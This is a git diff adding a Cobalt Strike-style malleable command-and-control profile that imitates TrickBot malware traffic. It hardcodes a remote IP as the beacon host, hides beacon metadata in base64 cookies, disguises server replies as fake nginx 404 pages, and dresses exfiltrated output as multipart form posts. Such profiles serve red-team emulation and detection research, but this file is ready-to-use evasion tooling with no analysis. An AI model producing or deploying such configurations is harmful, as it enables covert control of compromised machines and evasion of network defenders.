diff --git a/crimeware/trickbot.profile b/crimeware/trickbot.profile
new file mode 100644
index 0000000..ac23dd1
--- /dev/null
+++ b/crimeware/trickbot.profile
@@ -0,0 +1,115 @@
+#trickbot
+#https://community.rsa.com/community/products/netwitness/blog/2017/07/13/necurs-delivers
+#https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
+#xx0hcd
+
+
+set sleeptime "30000";
+set jitter    "20";
+set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)";
+set dns_idle "8.8.8.8";
+set maxdns    "235";
+
+
+http-get {
+
+    set uri "/";
+    
+    client {
+
+	header "Host" "203.150.19.63:443";
+	header "Connection" "Keep-Alive";
+	header "Cache-Control" "no-cache";
+        
+        
+        metadata {
+            base64url;
+	    prepend "D007=";
+            header "Cookie";
+
+
+        }
+
+    }
+
+    server {
+
+	header "Server" "nginx";
+        header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
+        header "Content-Type" "text/html";       
+	header "Connection" "keep-alive";
+        
+	
+        output {
+            base64url;
+	    prepend "<html>
+	    <head><title>404 Not Found</title></head>
+	    <body bgcolor='white'>
+	    <center><h1>404 Not Found</h1></center>
+	    <hr><center>nginx</center>
+	    </body>
+	    </html>
+	    <!CDATA['=";
+	    append "']>
+	    </html>";
+	    print;
+        }
+    }
+}
+
+http-post {
+    
+    set uri "/response.php";
+
+    client {
+       
+	header "Content-Type" "multipart/form-data; boundary=----ZMZTCR";
+        
+        output {
+            netbios; 
+	    prepend "----ZMZTCR
+	    Content-Disposition: form-data;name='sourcelink' ";
+
+	    append " Content-Disposition: form-data;name='sourcequery'
+	    ----ZMZTCR";
+	    print;
+	    
+
+
+        }
+        
+        
+        id {
+            base64url;
+	    header "Cookie";
+
+
+        }
+    }
+
+    server {
+
+	header "Server" "nginx";
+        header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
+        header "Content-Type" "text/html; charset=utf-8";        
+	header "Connection" "keep-alive";
+        
+
+        output {
+            base64;
+            print;
+        }
+    }
+}
+
+http-stager {
+    server {
+        header "Server" "nginx";
+        header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
+        header "Content-Type" "text/html; charset=utf-8";        
+	header "Connection" "keep-alive";
+    
+    }
+
+
+}